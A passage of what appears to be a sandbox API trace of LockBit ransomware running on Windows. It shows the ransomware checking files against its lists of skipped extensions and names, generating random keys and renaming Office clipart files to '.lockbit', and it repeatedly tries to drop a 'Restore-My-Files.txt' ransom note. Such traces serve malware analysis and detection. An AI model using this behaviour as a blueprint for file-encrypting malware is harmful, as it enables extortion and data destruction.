office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.792] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563ba0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1338, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107450.WMF", cAlternateFileName="")) returned 1 [0141.792] lstrcmpiW (lpString1=".", lpString2="J0107450.WMF") returned -1 [0141.792] lstrcmpiW (lpString1="..", lpString2="J0107450.WMF") returned -1 [0141.792] PathFindExtensionW (pszPath="J0107450.WMF") returned=".WMF" [0141.792] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.792] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.792] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.792] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.792] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.792] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.792] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.792] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.792] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.792] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.792] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.792] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.793] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.793] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.794] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.794] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.794] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.794] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.794] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.794] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.794] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.794] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.794] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.794] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.794] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107450.WMF") returned 1 [0141.794] lstrcmpiW (lpString1="ntldr", lpString2="J0107450.WMF") returned 1 [0141.794] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107450.WMF") returned 1 [0141.794] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107450.WMF") returned -1 [0141.794] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107450.WMF") returned -1 [0141.794] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107450.WMF") returned 1 [0141.794] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107450.WMF") returned -1 [0141.794] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.794] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF") returned=".WMF" [0141.794] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.794] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.794] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.794] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.795] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.796] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.796] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.796] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF.lockbit") returned 72 [0141.796] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107450.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.797] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.797] malloc (_Size=0x40068) returned 0x3df0008 [0141.797] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4920) returned 1 [0141.797] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.798] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.798] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.798] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.798] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.798] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0141.814] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.814] malloc (_Size=0xa6) returned 0x77d7a8 [0141.818] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0141.819] free (_Block=0x77d7a8) [0141.819] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107450.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.819] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.819] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.820] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x52e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107452.WMF", cAlternateFileName="")) returned 1 [0141.820] lstrcmpiW (lpString1=".", lpString2="J0107452.WMF") returned -1 [0141.820] lstrcmpiW (lpString1="..", lpString2="J0107452.WMF") returned -1 [0141.820] PathFindExtensionW (pszPath="J0107452.WMF") returned=".WMF" [0141.820] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.820] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.820] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.821] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.821] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.821] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.827] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.827] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.827] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.827] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.832] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.832] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.833] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107452.WMF") returned 1 [0141.833] lstrcmpiW (lpString1="ntldr", lpString2="J0107452.WMF") returned 1 [0141.833] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107452.WMF") returned 1 [0141.833] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107452.WMF") returned -1 [0141.833] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107452.WMF") returned -1 [0141.833] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107452.WMF") returned 1 [0141.833] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107452.WMF") returned -1 [0141.833] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.834] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF") returned=".WMF" [0141.834] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.834] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.834] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.835] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.835] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.835] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.835] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF.lockbit") returned 72 [0141.835] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107452.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.836] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.837] malloc (_Size=0x40068) returned 0x3df0008 [0141.837] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=21216) returned 1 [0141.837] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.837] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.837] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.838] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.838] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0141.846] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.846] malloc (_Size=0xa6) returned 0x77d7a8 [0141.846] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0141.847] free (_Block=0x77d7a8) [0141.847] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107452.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.847] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.847] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.847] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe8c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107456.WMF", cAlternateFileName="")) returned 1 [0141.847] lstrcmpiW (lpString1=".", lpString2="J0107456.WMF") returned -1 [0141.847] lstrcmpiW (lpString1="..", lpString2="J0107456.WMF") returned -1 [0141.847] PathFindExtensionW (pszPath="J0107456.WMF") returned=".WMF" [0141.847] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.847] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.847] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.847] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.847] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.847] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.847] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.847] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.847] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.847] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.847] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.847] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.847] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.848] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.848] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.849] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.849] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.849] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.849] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.849] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.849] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.849] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.849] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.849] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107456.WMF") returned 1 [0141.849] lstrcmpiW (lpString1="ntldr", lpString2="J0107456.WMF") returned 1 [0141.849] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107456.WMF") returned 1 [0141.849] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107456.WMF") returned -1 [0141.849] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107456.WMF") returned -1 [0141.849] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107456.WMF") returned 1 [0141.849] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107456.WMF") returned -1 [0141.849] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.849] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107456.WMF") returned=".WMF" [0141.849] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.849] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.849] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.849] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.849] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.849] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.849] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.849] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.850] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 